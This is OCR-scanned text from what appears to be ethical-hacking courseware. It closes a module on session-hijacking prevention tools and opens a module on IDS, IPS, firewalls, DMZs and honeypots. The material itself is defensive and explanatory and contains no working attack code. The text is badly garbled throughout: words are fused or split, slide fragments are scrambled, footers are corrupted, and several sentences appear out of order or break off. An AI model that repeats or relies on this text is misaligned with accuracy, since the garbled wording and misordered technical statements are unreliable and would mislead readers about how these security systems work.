mason ‘ae
yt

SessionHijacking PreventionTools
To prevent
session hijacking, testingof web applications
the security andthe analysisof static
codeto identify i n webapplications
vulnerabilities Identifying
are required. vulnerabilities
at an
earlystagehelpsi n implementing securitymeasures to protectagainstsession hijacking
attacks.
=
OSAST
Source:https://www.checkmarx.com
Checkmarx CxSAST is a unique source-code analysis
solutionthat providestools for
identifying,
tracking,and repairingtechnical flawsin source code,suchas
and logical
securityvulnerabilities,
compliance issues, and businesslogicproblems. CxSAST
supports open-source analysis (CxOSA), enablinglicensing and compliance
management, vulnerability
alerts,policy
enforcement,and reporting.
Thistool supports
wide rangeof OSplatforms,
‘a programming languages,andframeworks.
professionals
Security various sessionhijacking
can use thistool to prevent attackssuch
MITM attacks,
‘as session fixationattacks, andXSSattacks.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 8
Module 1454
Page ca
acing
an
©
Cp an
Contemene
 Fiddler
Source:https://www.telerik.com
Fiddleris usedfor performing
web-application t ests suchas the decryption
security of
HTTPS
traffic
is a requests
manipulation
and
web debugging
Internet.
using
decryption
technique.
of
proxy that logsall HTTP(S)
an MITM
traffic betweena computer
and the
Fiddler

professionals
Security bydebugging
can use Fiddlerto test web applications thetraffic
fromsystems
as well as manipulating
andediting
web sessions.

Figure11.41:Screenshot
ofFidler
Thefollowing
are some additionalsession hijacking preventiontools:
Nessus (https://www.tenable.com)
=
(https://www.netsparker.com)
Netsparker
=
(hetp://wapiti.sourceforge.net)
Wapiti
(https://www.exclamationsoft.com)
WebWatchBot

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Module Summary

inthis mot, we havediscussedthefollowing

> Sesion hitching
concepts
of
and diferenttypes sessionbacking

lve andnetworklevelsession jacking

‘aplication attacks

season detectionandpreventiontals
hijacking
Weconcluded withadetaleddscusson on various cuntermasures tobe employed
to prevort session ijchng attemptbythrestsetors
Inthe next module,we wil dics i n deta howattackers,aswel setial hackersand
er-testes,evade
network secuty components,suchas
10S
firewalls
and to compromise

Module Summary
we discussed
In this module, conceptsrelatedto sessionhijacking,
alongwith different
typesof
session hijacking.
We also discussedi n detail application
level and network level session
hijacking this modulepresented
attacks.Furthermore, various session hijacking
tools.It also
discussed session hijacking
how to detect,protect,anddefendagainst attacks,
i n addition to
hijacking
various session detection tools. Thismoduleendedwith a detailed
and prevention
discussiono n various countermeasuresto be employed
to preventsession hijacking
attempts
bythreatactors.
In thenext module, i n detailhow attackers,
we will discuss as well as ethical
hackersandpen-
evadenetworksecurity
testers, components suchas IDSsandfirewallsto compromise network
infrastructure,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Module12:
Evading and Honeypots
Firewalls,
IDS,
 Module Objectives
DS,P,Frewal, andHoneypot
Understanding Concepts

Feewal,
105,19, andHoneypot
Solutions

Bypass
diferent
Understanding Techniques

diferent
Understanding
to

Techniques
to Bypass
1s

Firewalls

1s/Frewal Tools
Evading

ferentTechniques
Understanding to DetectHoneypats

Eaton Countermeasures
1Ds/Frewal

Module Objectives
Thewidespread
i n general.
detection
use ofthe Internetthroughout
Organizations
systems(1D),
adopt
intrusion prevention systems(IPS),
world
the business hasboostednetworkusage
measures suchas firewalls,
various networksecurity
and “honeypots―
intrusion
to protecttheir
networks.Networks are the most preferred targetsof hackersfor compromising an
organization’s andattackerscontinue to findnew waysto evadenetworksecurity
security,
measures andattackthesetargets

Thismoduleprovides
deep insights technologies,
into various networksecurity suchas IDS, IPS,
firewalls,
andhoneypots. It explains
theoperations ofthesecomponents as well as the various
techniquesused by attackersto evade them. Further, it describesthe countermeasures
necessary suchattacks.
to prevent

=
of module,
At the end this
willable
Describe
to:
you
IPS,
IDS,
be
firewall,
andhoneypot
concepts
Use differentIDS, firewall,
IPS, andhoneypot
solutions
‘=
Explain
differenttechniques
to bypass
IDS
=

Explain
various
techniques
bypass
firewalls to
=

Usetools
to
evade
different
Explain
10S/firewalls
differenttechniques
to detecthoneypots
‘Adopt
countermeasures IDS/firewall
against evasion

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

IDS,IPS,Firewall,and Honeypot
Concepts
Ethical
hackersshouldhavean ideaaboutthefunction, anddesign
role,placement, of firewalls,
IPS,
IDS, and honeypots an organization's
to protect networkbyunderstanding
howan attacker
evadessuchsecurity
measures.Thissection provides
of
an overview these basic
concepts.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 IntrusionDetectionSystem
(IDS)
“8
detection
(ios) |
software
Anintrasion

that
isa
stem
system
or
How an IDSWorks
>
Nowa
and
hardware
dec nepets

af
‘Mlintound
outbound
network fr sspclous

the
‘utside/insie
fiewall to

tom ovtsdeiside
‘ripnating

Intrusion DetectionSystem (IDS)

‘An
intrusion detectionsystem(IDS) softwareor hardwaredeviceusedto monitor,
is a security
detect, and protect networksor systems frommalicious activities;it alertsthe concerned
security personnel immediatelyupon detecting intrusions. IDSare extremely usefulas they
monitor the inbound/outbound trafficof the network and checkfor suspicious activities
continuously to detecta networkor system securitybreach,Specifically, theychecktrafficfor
signatures that matchknownintrusion patterns and raise an alarmwhena matchis detected.
IDScan be categorized
into active and passiveIDSdepending on their functionality.
A passive
IDS generally
onlydetectsintrusions while an active IPS not onlydetectsintrusions i n the
networkbut alsopreventsthem.
Main Functionsof IDS:
=
An IDSgathers
and analyzes
informationfrom within a computeror a network to
identify
possible
violations policy,
of the security including
unauthorizedaccess,a s well

IDS is alsoreferredto as a “packet

‘An sniffer,― traveling
packets
whichintercepts via
various communication mediaandprotocols, TCP/IP
usually
Thepackets are analyzed
after theyare captured,
IDSevaluatestraffic for suspected
‘An intrusions and raises an alarmupon detecting
suchintrusions.
‘Where
IDSresidesin the network
Oneof the most common places to deploy
an IDSis near the firewall.Depending
on the traffic
tobe monitored, an IDSis placed the firewallto monitor suspicioustraffic
outside/inside

ical andCountermensores
Mackin ©by E-Comel
Copyright
 fromoutside/inside
originating the network.Whenplaced the IDSwill beideali f it is
inside,
near a DMZ; however,the best practice is to use a layered defensebydeploying one IDSi n
front
of
the the
firewallandanotherone behind firewall in the network,
Beforedeployingthe IDS,it is essentialto analyze the networktopology,understandhowthe
trafficflowsto andfromthe resources that an attackercan use to gainaccess to the network,
and identifythe criticalcomponents that will be possibletargetsof various attacksagainst
the
network.Afterthe position of the IDSi n the networkis determined, the IDSmust beconfigured
to maximize its network
protection
effect.
internet Router
a, rossiPs
ty

en (SRERB|—
User

of
1OS
Howa n IDSWorks
Figure
Intranet

12:1:Placement
tosiies

primarypurposeof the IDS is to provide

‘The real-timemonitoring
anddetectionof intrusions.
‘Additionally,
reactive IDS(andIPS) respond
can intercept, to,and/or
preventintrusions.
An IDSworksas follows:
+
IDShavesensors to detectmalicious i n data packets,
signatures and some advancedIDS
includebehavioral activitydetectionto detectmalicious trafficbehavior. Evenif the
packet signaturesdo not matchperfectly with the signatures i n the IDSsignature
database, the activitydetectionsystem can alertadministrators about possibleattacks.
If the signature matches, performs
the IDS predefinedactions suchas terminating the
connection,blocking the IP address, dropping the packet, and/orraisingan alarmto
notify the administrator.
Whensignature matches, anomaly detectionwill be skipped; otherwise, the sensor may
analyze traffic patterns for an anomaly.
Whenthepacket passes all thetests,the IDSwillforwardit to thenetwork.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 IDSPreprocessor

Statetl
Protocol
of 0s
12.2:Working
Figure

Modul2 1462
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
 How an IDSDetectsan Intrusion?

Signature
Recognition
alo known a s misuse detection,tis
ofa systemor network resource
to identity
events

Iedetects

in
a
theintrusion based
andcomponents computer
on thefied behavioral
sytem characteristic
users ofthe

Protocol
Anomaly
Detection
vendors of
In thistype detection,
models
deploythe TCP/IP
are bul to explore
specification
a nomalies
inthe way
in which

How an IDSDetectsan Intrusion?

‘An
IDSuses threemethodsto detectintrusions i n the network.
Signature
Recognition
Signaturerecognition, tries to identify
alsoknownas misuse detection, events that
indicatean abuseof a systemor network.Thistechnique
involvesfirst creating
models
of possible
intrusions then
and
comparing
models events
these
a
modelmust detect an attackwithout disturbing
with incoming
forIDSwere createdunderthe assumption
detectiondecision.Thesignatures
normalsystem
to make
that the
traffic. Onlyattacks
shouldmatchthe model;otherwise,
falsealarmscouldoccur.
© Signature-based
intrusion detection compares incoming or outgoingnetwork
packets
withthe binary pattern-matching
of knownattacksusingsimple
signatures
techniques
to detectintrusions.Attackerscan definea binary for a specific
signature
portion
ofpacket,
TCP
flags.
the
‘Signature
suchas
can detectknownattacks.
recognition thereis a
However, possibility
that
other innocuous packets
contain the same signature,
which will triggera false
positivealert.
Improper signaturesmaytriggerfalsealerts.Todetectmisuse,a massivenumberof
signaturesare required.
Themore the signatures, the greater
are the chancesa re of
the IDSdetecting attacks;however,the trafficmay incorrectly matchwith the
signatures,thusimpedingsystem performance,
A largeamount of signature data requires more networkbandwidth.IDS compare
signaturesof data packets
againstthosein the signature database.An increase in

ical andCountermensores
Mackin ©by E-Comel
Copyright
 the numberof signatures
in the database
couldresulti n the dropping
of certain
packets
New virus attacks suchas URSNIFand VIRLOCKhavedriventhe needfor multiple
for
signatures single
a attack. Changing a singlebit in some attack stringscan
invalidatea signature
generated for that attack.Therefore,entirely
new signatures
are required

Despite
to detect
the problems
asimilar
attack.
with signature-based IDS,suchsystems are popular,andthey
workwellwhenconfigured
correctly closely.
andmonitored
‘Anomaly
Detection
detection,
Anomaly detection,―
or “not-use differsfromsignature Anomaly
recognition.
detectioninvolvesa databaseof anomalies.An anomaly is detectedwhen an event
outsidethe tolerancethresholdof normaltraffic.Therefore,
‘occurs anydeviationfrom
regularuse is an attack. Anomaly detectiondetectsintrusions basedon the fixed
behavioralcharacteristicsof the users and components i n a computersystem.

Establishing
a modelof normaluse is the most challenging an anomaly
stepi n creating
detector,
©. In the traditionalmethodof anomaly detection,essentialdata are keptfor checking
variations in networktraffic. However,i n reality,
there is some unpredictability
in
network traffic,and there are too manystatisticalvariations, thus making these
modelsimprecise. Some events labeledas anomalies might onlybe irregularities
in
networkusage.
In this typeof approach,the inability
to construct a modelthoroughly on a regular
networkis a concern. Thesemodelsshouldbeusedto check networks.
specific
Anomaly
Protocol Detection
Protocolanomaly detection depends on the anomaliesspecific to a protocol. It
identifiesparticular deployment
flawsi n vendors’ of the TCP/IPprotocol.Protocolsare
designed according
to RFCspecifications,
whichdictatestandardhandshakes to permit
universalcommunication. Theprotocolanomaly
andexploits
Thereare new attackmethods
detector
can identify

thatviolateprotocol
new attacks.

standards.
Maliciousanomaly signaturesare becoming increasingly
common. Bycontrast,the
network protocolis well definedand is changing slowly.Therefore,
the signature
databaseshouldfrequently be updated to detectattacks.
Protocolanomaly
detectorsare differentfromtraditionalIDSin terms of how they
alarms
present
The bestway to presentalarmsis to explain
whichpartof the state systemis
‘compromised. must have thorough
Forthis purpose,IDSoperators knowledge
of
protocol
design.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 GeneralIndicationsof Intrusions

File System
Intrusions Network Intrusions System
Intrusions
T h epresnoeof nor wfonlar probeoftheauiable
Reposted Shortor incomplete
logs

= G yee
cutee
GeneralIndicationsofIntrusions
Intrusionattemptson networks, can be identifiedbyfollowing
or file systems
systems, some
general
indicators:
File System Intrusions
Byobserving systemfiles,the presenceof an intrusion can be identified.System files
recordthe activities of the system. Anymodificationor deletionof the file attributesor
the file itselfis a signthatthe systemhasbeena targetof an attack:
©. If
you find new, unknown files/programs
on your system, then there is a possibility
that the systemhas beenintrudedinto. The systemcan be compromised to the
extent
that
itcan,
turn, network
systems.
in compromise other
privileges
Whenan intrudergainsaccess to a system, he or shetries to escalate to
gain administrativeaccess. Whenthe intruder obtainsadministratorprivileges,
he/shecouldchange file permissions,for example,from read-onlyto write.

Unexplained modifications
i n file size are alsoa n indication of an attack,Make sure
you analyzeall yoursystem files.
The presence of rogue suldand sgidfiles o n your Linux systemthat do not match
your
master could
Youcan identify
an
list ofsuidandsgid
unfamiliar
files indicate attack
file namesin directories, including executablefileswith
strangeextensionsanddoubleextensions,

aprobable
filesare alsoa signof
Missing intrusion/attack

ical andCountermensores
Mackin ©by E-Comel
Copyright
=
NetworkIntrusions
Similarly,
general
indicationsof networkintrusions include:
Asuddenincrease in bandwidthconsumption
probes
Repeated of the availableservices on your machines
Connectionrequests fromIPsother thanthosei n thenetworkrange,whichimply
user (intruder)
that an unauthenticated to connect to the network
is attempting

Repeated
login
attemptsfromremote hosts
‘A influxof logdata,
sudden whichcouldindicateattemptsat DoSattacks,
bandwidth
andDDoSattacks
consumption,
System
Intrusions
Similarly,
generalindicationsof systemintrusions include:

changes
‘Sudden i n logs
such as shortor incomplete logs
Unusually
slowsystem performance
Missing
logs
or logs or ownership
with incorrect permissions
softwareandconfiguration
Modificationsto system files
Unusualgraphic
displays
or text messages

Gaps
in systemaccounting
‘System or reboots
crashes
Unfamiliarprocesses

ical andCountermensores
Mackin ©by E-Comel
Copyright
 of IntrusionDetectionSystems
Types
IntrusionDetectionSystems
[Network-Based

[© ‘edetects
malicious
activity
such
as Deniat-of
Service {incur
byhovingto
monitor
eachsystem
e vent

gag =
gag?
of IntrusionDetectionSystems
‘Types
Thereare two typesof intrusion detectionsystems:
+
IntrusionDetection Systems
Network-Based
Network-based (NIDS)
intrusion detectionsystems checkevery packet
enteringthe
networkfor the presenceof anomaliesand incorrect data. Bylimiting the firewall to
droplargenumbersof data packets, the NIDS checksevery packet thoroughly. A NIDS
andinspects
captures all traffic.It generates
alertsat the IPor application
levelbasedon
the content. NIDS are more distributedthan host-basedIDS. The NIDS identifiesthe
anomaliesat the router andhostlevels.It auditsthe informationcontainedin the data
packets and logsthe informationof maliciouspackets; furthermore, a threat
it assigns
levelto eachriskafterreceivingthe data packets.Thethreat levelenablesthe security
team to remain on alert.Thesemechanisms typicallyconsist of a blackbox placed on
thenetworkin a promiscuous mode, for patternsindicativeof an intrusion. It
listening
detectsmaliciousactivitysuchas DoSattacks,portscans,or even attemptsto breakinto
bymonitoring
computers networktraffic,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Router Firewall
Untrusted
Network

O
Management
ServerConsole
nee
12.3:Network-based
Figure
IntrusionDetectionSystems
Host-Based
10S
fF(i
(105)
‘DNS
Servers

‘Ahost-based IDS(HIDS) analyzes eachsystem's behavior.TheHIDScan be installedon

any system rangingfroma desktop PCto a server. It is more versatile thanthe NIDS.In
additionto detecting unauthorizedinsideractivity, host-based systems are alsoeffective
i n detecting unauthorized filemodification.TheHIDSfocuses on thechanging aspectsof
localsystems. It is alsomore platform-centric, with a greater focuson the WindowsOS;
nevertheless, otherHIDSare availablefor UNIX platforms. Thesemechanisms usually
include auditing events that occur on a specific host. They a re not very common
because of theoverheadthey incur byhaving to monitor eachsystem event.

&
=z, oes
‘Agent
Agent
Untrusted

Baga
_

Management
Centerfor
ThisMCCSAserver
CiscoSecurityAgents:
runsa CSA
agentitself
12.4:Host-bazed105(HDS)
Figure

ical andCountermensores
Mackin ©by E-Comel
Copyright
 of IDSAlerts
Types

te
Positive
‘An
0S a raises an alarmwhen legitimate
attackoccurs

eeesiti
‘An
0S wien raises an alarm no attackhastakenplace

eerie
‘An
FalseNegative
0S doesnotraise an alarmwhena legitimate
attack taken
has
place 2

oes
AnIDSdoesnotaise an alarmwhenan
attack
hasnot
taken pace WK

of IDSAlerts
‘Types
‘An four typesof alerts:True Positive,
IDSgenerates FalsePositive,
FalseNegative,
andTrue
Negative.
=
TruePositive(Attack Alert):
-
A true positiveis a conditionthat occurs whenan event
an alarmandcauses the IDSto react as if a realattackis i n progress.
triggers Theevent
may be an actual attack, in which case an attacker attemptsto compromisethe
network,or it may be a drill,i n whichcase security personnel use hackertools to test a
networksegment.
FalsePositive(Noattack Alert): Afalsepositiveoccurs if an event triggers
-
a n alarm
whenn o actualattackis i n progress.It occurs whena n IDStreats regularsystemactivity
as an attack.Falsepositives tend to makeusers insensitive to alarmsandweakentheir
reactions to actual intrusion events. While testing the configurationof an IDS,
administrators usefalsepositivesto determine whethertheIDScan distinguish between
falsepositivesandrealattacks.
FalseNegative (AttackNo Alert):
-
A falsenegative is a conditionthat occurs whenan
IDSfailsto react to an actualattackevent. Thisconditionis the most dangerous failure,
as the purposeof an IDSis to detectandrespond to attacks.

TrueNegative (Noattack NoAlert):-

is a condition
Atrue negative that occurs whenan
IDSidentifiesan activityas acceptable behaviorand the activityis acceptable. A true
means successfully
negative ignoringacceptablebehavior.It is not harmful, as the IDS
performsas expected in thiscase.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 IntrusionPreventionSystem
(IPS)
|@Anintrason
Intusons
prevention
system(i) i
butalsopreventing
them
alsoc onsidered
a an active108sine
he
of not onlydetecting
capable

{©Unt an1, whichpase,

anaizethe networkWat
an
and
Ps
placed
network
and
itne inthe
to automaticaly
betweenthesource destinationto actively
ake dedsons onthe wai thats eneing the network

Intrusion PreventionSystem (IPS)

Intrusionprevention (IPS)
systems are consideredas active IDS,as theyare capable of not only
detecting intrusionsbut alsopreventing them.IPSare continuous monitoring systems that
often sit behindfirewallsas an additionallayer
of protection. UnlikeIDS, whichare passive,IPS
are placed betweenthe source and the destination,
inline i n the network, to actively analyze
the networktrafficand makeautomateddecisionsregarding the traffic that is enteringthe
network.
Someoftheactionsthat an IPSis meant to perform
are asfollows:
+
Generatealertsif anyabnormaltrafficis detectedin the network
+
Continuously
recordreal-timelogs
of networkactivities
+

+
Block
and
Detect and
traffic
filter malicious

eliminate
quickly,
as threats itis placed
inlinei n the operational
network
+
Identify withoutgenerating
threatsaccurately falsepositives
IPStakesactions basedon certain rulesand policies
‘An configuredinto it. In other words,the
IPScan identify,
can alsobe employed
insiderthreats,
to detectcriticalissuesin corporate
maliciousnetworkguests, ete.
security of
log,and preventthe occurrence any intrusion or attacki n the network.IPS
policies suchas notorious

Classification
of IPS:
LikeIDS,
IPSare alsoclassified
into two types:
+
Host-based
IPS
Network-based
IPS

ical andCountermensores
Mackin ©by E-Comel
Copyright
‘Advantages
of IPSover IDS:
Unlike

[PS
1DS, well
as
drop
illegal
monitor in
IPScan blockas

activities
occurring
canbeusedto
single
packetsthenetwork
in a organization
=
preventthe occurrence
IPS can controlling
of direct attacksi n the network by the
of
amount networktraffic

ofanP Splacement
125: Example
Figure

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Firewall

(©.
ace
atthe
junction
They paced
gateway
the networks,
and'spublinetwork a
s ucha
or
Internet
between
two whichIs usallybetweenprivate network

Firewalls
examine
the
allmessages
meetthe specified
o leaving Intranetor private
entering
secutycrtera
network)
andblock thosethatdonot

Tt xcmom
Firewall
A firewall is
a software-or hardware-based systemlocatedat the network gatewaythat
protectsthe resources of a privatenetworkfromunauthorized access by users on other
networks.They are placed
networkanda public
or leaving
at the
junction
or gatewaybetweentwo networks,
networksuchasthe Internet.Firewalls
usuallyprivate
examine all the messages
the intranet andblockthosethatdo not meet the specified
security
entering
criteria, Firewalls
a
may be concernedwith the typeof traffic or with the source or destinationaddresses and
ports.They
placed
include
aset
of toolsthat monitor the flowof trafficbetweennetworks.A firewall
at the networklevelandworking
to determinewhetherto forward
closely with the router filtersall the networkpackets
themtowardtheir destinations,Always installfirewalls
away
fromthe rest of the network,so that none of the incoming requests can gaindirectaccess to a
configured,
privatenetworkresource. If appropriately thefirewallprotects on one side
systems
of A
onother
it fromsystems the
firewall is
side.
an intrusion detectionmechanism
that is designed
byan organization's
policy.
security c an change
Its settings to its functionality.
changes
to makeappropriate
Firewallsc an be configured
to restrict incoming trafficto POPandSMTPand to enable
emailaccess.Certainfirewallsblockspecific
emailservicesto avoidspam.
A firewallc an beconfigured
to check trafficata “checkpoint,―
inbound wherea security
audit is performed. It can also act as an active “phone
tap―tool for identifying an
attemptto dialinto modemsin a securednetwork.Firewalllogs
intruder’s consist of
logging informationthat notifiesthe administratoraboutall attemptsto access various
services.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Thefirewallverifiesthe incomingand outgoingtrafficagainstits rulesand acts as a
router to move databetweennetworks.Thefirewallallowsor deniesaccess requests

made
one
of
itto onother
from side
Identify
services the side.
allthe attemptsto loginto the networkfor auditing,
Unauthorized
attemptscan
be identified byembedding
an alarmthat is triggered
when an unauthorizeduser
attemptsto login, Firewallscan filter packets
basedon the addressand typeof trafic.
They as well as portnumbersduring
recognizethe source and destinationaddresses
filtering,
address and theyidentify protocol
the typesofnetworktrafficduring filtering,
Firewallsc an identify
the state andattributesof datapackets.
Secure LocalAreaNetwork
Private Public Network

12.6:Example
Figure
ail}
of Firewall

ical andCountermensores
Mackin ©by E-Comel
Copyright
 FirewallArchitecture

‘Maltchomed
Firewall —

‘oon

othe
neta
baveon
the wee acy ober

Firewall Architecture
Thefirewallarchitectureconsistsof the following
elements:
Bastion Host
Thebastionhostis designedfor defendingthe networkagainstattacks.It acts as a
mediatorbetweeninsideand outsidenetworks.A bastionhostis a computer system
designed
andconfiguredto protectnetworkresources fromattacks.Trafficenteringor
leaving
the networkpasses through
thefirewall.It hastwo interfaces:
© Publicinterfacedirectly
connectedto the Internet
0. Private interfaceconnected
to the intranet,

internet
~~ Bastion
Host intranet
Figure
12.7:Bastion
HostFirewall
Screened
Subnet
A screenedsubnet(DM2)
is a protected
networkcreatedwith a two- or three-homed
firewallbehinda screeningfirewall,
and it is a term that is commonly usedto referto
the DMZ. Whenusinga three-homedfirewall, connect thefirst interfaceto the Internet,
the secondto the DMZ,and the third to the intranet, The DMZ responds to public

ical andCountermensores
Mackin ©by E-Comel
Copyright
requestsandhasno hostsaccessed
bytheprivatenetwork.Internetuserscannot access
the privatezone.
Theadvantage of screeninga subnetawayfromthe intranet is that public requests can
be respondedto without allowing traffic into the intranet. A disadvantage
of the three-
homedfirewallis that if it is compromised, boththe MZ andthe intranet couldalsobe
compromised. A safertechnique is to use multiple firewallsto separate
the Internet
to the the
fromthe DMZ, and then separate DMZfrom intranet,
Intranet

Internet +="

‘Multi-homed
Firewall
Figure
Subnet
12.8:Seeoned
Firewall
multi-homedfirewall is a node with multiple
‘A NICsthat connects to two or more
networks.It connects eachinterface to separate networksegments logicallyand
physically.
A multi-homedfirewallhelps i n increasingthe efficiency
and reliability
of an
IP network.Themultichomed firewallhasmore thanthreeinterfaces that allowfor
further subdividingthe systemsbased on the specific securityobjectives of the
However,
organization. the modelthat provides deeper is the back-to-back
protection
firewall
Intranet

Internet

12.9:Multshomed
Figure Frewal

ical andCountermensores
Mackin ©by E-Comel
Copyright
 DemilitarizedZone (DMZ)

(©The

(©ean b ecreated
‘he
that
as internal
Oz iss network

using
rewall
inernaltrusted
serves butfer between

networkt he DMZnetwork,
the

andthe external
secure network
assigned
ith threeor more network interfaces,
untrosted
andtheineecure
with specie
network
Internet

rolessuchat

Network
‘onpoate

63

Demilitarized Zone(DMZ)
PRReee
In computer networks,the demilitarizedzone (DMZ) is a n area that hostscomputer(s) or a
smallsub-network placed as a neutralzone between particular
a company’s
andan untrustedexternalnetworkto preventoutsideraccessto a company’s
DMZ serves as a bufferbetween
internalnetwork
privatedata.The
the secure internalnetwork and the insecure Internet,as it
addsa layer
of security
to the corporate LAN, thuspreventing directaccessto other partsof the
network.
A DMZ is createdusinga firewallwith three or more networkinterfaces that are assigned
specificroles,
suchas an internaltrusted network,a DMZ network, or an externaluntrusted
network(Internet).Anyservice suchas email,web,or FTPthat provides accessto external
users can be placed i n the DMZ. However, web servers that communicate with database
servers cannotresidei n the DMZ,as theycouldgive outsideusers direct accessto sensitive
information.Thereare manywaysin whichthe DMZcan be configured according to specific
networktopologies andcompanyrequirements.
Netwerk
Corporate

peeeee 12.10:D emitaiedZone(ON)

Figure

ical andCountermensores
Mackin ©by E-Comel
Copyright
 of Firewalls
Types

a =
ao
%

of Firewalls
‘Types
Thereare two typesof firewalls.
+
HardwareFirewalls
hardware
‘A firewallis a dedicated firewalldevice placed on the perimeter of the
network.It is an integral partof the networksetupand is alsobuilt into broadband
routers or usedas a standaloneproduct. A hardwarefirewall helps to protectsystems
on the localnetworkandperforms effectivelywith little or no configuration. It employs
the technique of packet filtering.
and destinationaddresses, a
It readsthe headerof packet to find out the source
and comparesthemwith a set of predefined
createdrulesthat determinewhetherit shouldforwardor dropthe packet.
and/oruser-
A hardware
firewallfunctions o n an individualsystem or a particular networkconnectedusinga
singleinterface.Examples of hardwarefirewallsincludeCiscoASAand FortiGate.
Hardwarefirewalls protectthe privatelocalarea network
However,hardwarefirewallsare expensiveas well as difficult to implement
and
upgrade.
Advantages:
© system(0S)
A hardwarefirewallwith its operating
Security: is considered
to reduce
risksandincrease the levelof security
security controls,
‘Speed:
Hardwarefirewalls
initiate fasterresponsesandenable
more traffic.
Minimalinterference:
Sincea hardwarefirewalli s aseparate
networkcomponent, it
enablesbetter management and allowsthe firewall to shut down,move, or be
reconfigured
withoutmuchinterferencei n thenetwork.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Disadvantages:
More expensivethana softwarefirewall
Difficultto implement
andconfigure.
© Consumesmore spaceandinvolvescabling.

°a =
4

rg
AL

Usually
Part @
TCP/IP
Routerof
%
PrivateLocalAreaNetwork
Secure
PrivateNetwork
PublicNetwork

Figure
12.1: Hardware
Firewall
Software Firewalls
A softwarefirewall is similarto a filter, It sits betweena regular applicationand the
networking components of the OS.It is more usefulfor individualhomeusers and itis
suitablefor mobileusers whoneeddigital security whenworking outsidethe corporate
network.Further, it is easyto install on an individual'sPC,notebook, or workgroup
server. It helps protectyour systemfromoutsideattemptsat unauthorizedaccess and
provides protectionagainsteveryday Trojans and email worms. It includesprivacy
controls, web filtering, andmore. A softwarefirewallimplants itselfi n thecriticalarea of
theapplication/network path.It analyzes thedataflowagainst the ruleset.
The configuration of softwarefirewall is simple compared to that of a hardware
firewall.A softwarefirewall intercepts all requests from a networkto the computer to
determineif theyare valid and protects the computer fromattacksandunauthorized
access. It incorporates user-definedcontrols, privacy controls,web filtering, content
filtering, etc., to restrict unsafeapplications from runningon an individualsystem,
Softwarefirewallsuse more resources thanhardwarefirewalls, whichreducesthe speed
of the system.Examples of softwarefirewallsinclude thoseproduced byNorton,
McAfee, andKaspersky.
Advantages:
> Lessexpensive thanhardware
firewalls.
© Idealforpersonal
or
home
use
ical andCountermensores
Mackin ©by E-Comel
Copyright
 © Easierto configure
andreconfigure.
Disadvantages:
Consumes systemresources.
Difficultto uninstall.
forenvironments requiringfasterresponse
Not appropriate times.
Computer with
FicewallSoftware

Computer
with
FirewallSoftware

Ficewall
Software PublicNetwork

SecurePrivate
Network
Computer with PublicNetwork
FirewallSoftware
FirewallSoftware

Figure
12.12:
Software
Freval

ical andCountermensores
Mackin ©by E-Comel
Copyright
 FirewallTechnologies

|© Feewals
are designed
with
the
anddeveloped helpofdiferentfewnll services

ce Fite
used
for@a
‘Technologies creatingfirewall
sets
service

ttoyernpeston

ret LevelGateways ©rooteav0nProves

LevelFrewal
Aopication ©virus rate neowork
@server Adres Tasaton
Firewall Technologies
Firewallsa re designed and developed with the helpof different firewallservices. Eachfirewall
service provides security depending on its efficiencyand sophistication. Thereare different
typesof firewalltechnologies depending on wherethe communication is taking place,where
the trafficis intercepted i n the network, the statethat is traced, and so on. Considering the
capabilities of differentfirewalls, itis easyto chooseandplace a n appropriate firewallto meet
the securityrequirements i n the bestpossible way. Eachtypeof firewallhasits advantages.
Severalfirewalltechnologies
are available to implement
for organizations their security
measures. Sometimes,
firewall technologies
are combinedwith other technologies
to build
anotherfirewalltechnology.
For example,
NATis a routingtechnology; whenit is
however,
combinedwith a firewall, a firewalltechnology.
it is considered
Thevarious firewalltechnologies
are listedbelow:
+

+
Filtering
Packet

Circuit-Level
Gateways
+
Application-Level
Firewall

Multilayer
Stateful
Application
Inspection
Proxies
Virtual Private Network
NetworkAddress
Translation

ical andCountermensores
Mackin ©by E-Comel
Copyright
 tablebelowsummarizestechnologies
‘The at each
operating OS!layer:
OstLayer FirewallTechnology
VirtualPrivateNetwork(VPN)
Application
Application
Proxies
Presentation VirtualPrivateNetwork(VPN)
VirtualPrivateNetwork(VPN)
Session
Circuit-LevelGateways
VirtualPrivateNetwork(VPN)
Transport
Filtering
Packet
VirtualPrivateNetwork(VPN)
NetworkAddressTranslation(NAT)
Network
PacketFiltering
StatefulMultilayer
Inspection
VirtualPrivateNetwork(VPN)
DataLink
PacketFiltering
Physical =

Table
NotApplicable
1 21; Firewall
Technologies
levelsofthesetechnologies
Thesecurity vary according
to their efficiency
levels.Acomparison
of thesetechnologies
can bemadebyallowing themto passthrough the OSIlayerbetweenthe
hosts.Thedatapassesthrough layers
the intermediate from a higherlayerto a lowerlayer.
Eachlayeraddsadditionalinformationto the data packets.
Thelower layern ow sendsthe
obtainedinformationthrough the physicalnetwork to the upper layers and then to its
destination.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 PacketFiltering
Firewall

| Packt teringrewals
ner Form
work atthenetworkayer ofthe
O8|m odeor he internet of TEMP.They
usualy prt

In

Devending
of
pacefering frewaleachackts compared
onthepacket thectr,
an
to a
theFrewalcan
rite beforeitis forwarded
rap thepact, forward senda message tothe ornaor
ules
can
clude
theand
destination
the
source
and
destination
source
port
umber,
protocol Padres, andthe sed

Packet FilteringFirewall
In a packet
filtering
firewall,
each packet
is compared
with a set of criteria before it is
forwarded, Depending on the packetandthe criteria,the firewallcan drop the packetand
transmit it or send a messageto the originator.The rules can includethe source and the
destination the source andthedestination
IP address, portnumber, andthe protocol used.It
worksat the internet layer of the TCP/IP
modelor the networklayer of the OSImodel.Packet
filtering
firewallsfocuson individualpackets,
analyze their headerinformation, anddetermine
whichway theyneedto be directed.Traditionalpacket
filtersmakethisdecisionaccording
to
the following
informationi n a packet:
Source IP address:
information the
about whether
Usedto check
source
address
IP from
coming
aof
valid
the
thepacket
can
is
foundfromthe IPheader
source. The
packet.
packet
